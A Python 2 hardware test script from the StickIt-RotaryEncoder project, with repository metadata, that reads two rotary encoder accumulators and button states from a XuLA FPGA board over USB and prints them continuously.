] | permissive | zzfd97/StickIt-RotaryEncoder | c58ce2758676285d6ce539e895b6a5d01b451396 | 78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3 | refs/heads/master | 2021-12-12T18:56:36.702963 | 2017-02-12T04:00:09 | 2017-02-12T04:00:09 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,614 | py | # /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
| [
"[email protected]"
] |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.